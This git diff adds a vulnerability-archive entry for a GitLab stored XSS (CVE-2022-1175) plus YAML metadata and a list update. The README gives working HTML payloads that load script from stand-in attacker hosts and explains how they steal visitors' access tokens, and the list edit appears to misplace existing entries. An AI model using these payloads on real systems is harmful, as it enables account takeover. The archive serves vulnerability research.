diff --git a/cve/gitlab/2022/CVE-2022-1175/README.md b/cve/gitlab/2022/CVE-2022-1175/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..73862290671252e8515d7db4bfed391b36e36284
--- /dev/null
+++ b/cve/gitlab/2022/CVE-2022-1175/README.md
@@ -0,0 +1,14 @@
+
+# CVE-2022-1175
+
+Gitlab Stored XSS, can be set in an issue on a project, either your own or another users. Allows attacks such as creating & stealing a Personal Access Token (PAT) of anyone who visits an issue. PAT's can then provide full Gitlab API access as that user equivilent to a full account takeover. 
+
+Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though.
+
+```<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><base href=http://unsafe-website.com/><pre x=&#34;"><code></code></pre>```
+Standard script include also works depending on the sites CSP policy. This is more stealthy.
+```<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><script src="https://attacker-site.com/bad.js"></script><pre x=&#34;"><code></code></pre>```
+GitLab devs handily included the full XSS string in the code which can be found here:
+https://gitlab.com/gitlab-org/gitlab/-/compare/v14.9.1-ee...v14.9.2-ee?from_project_id=278964&page=4
+*Reference:*
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175
diff --git a/cve/gitlab/2022/yaml/CVE-2022-1175.yaml b/cve/gitlab/2022/yaml/CVE-2022-1175.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..e00dec6003483b69a25b51bac9da04e7a59b31ba
--- /dev/null
+++ b/cve/gitlab/2022/yaml/CVE-2022-1175.yaml
@@ -0,0 +1,24 @@
+id: CVE-2022-1175
+source: https://github.com/Greenwolf/CVE-2022-1175
+info:
+  name: GitLab是由GitLab Inc.开发，一款基于Git的完全集成的软件开发平台。
+  severity: medium
+  description: |
+    Gitlab CE/EE版本中用户输入的不当处理允许攻击者通过注入Notes中的HTML来利用XSS。
+  scope-of-influence:
+    GitLab CE/EE 14.4.x < 14.7.7
+    GitLab CE/EE 14.8.x < 14.8.5
+    GitLab CE/EE 14.9.x < 14.9.2
+  reference:
+    - http://packetstormsecurity.com/files/166829/Gitlab-14.9-Cross-Site-Scripting.html
+    - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1175.json
+    - https://gitlab.com/gitlab-org/gitlab/-/issues/353370
+    - https://hackerone.com/reports/1481207
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-1175
+    cwe-id: CWE-79
+    cnvd-id: None
+    kve-id: None
+  tags: cve2022, gitlab
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 614872af4aab23697aaa035e133164874393b6a6..d87256ad67188597befc14e5366a2b5210a6d211 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -60,6 +60,9 @@ cve:
     - CVE-2021-2109
   Zyxel:
     - CVE-2022-30525
+  Gitlab:
+    - CVE-2022-1175
+cnvd:
   WordPress:
     - CVE-2019-8942
   Zimbra: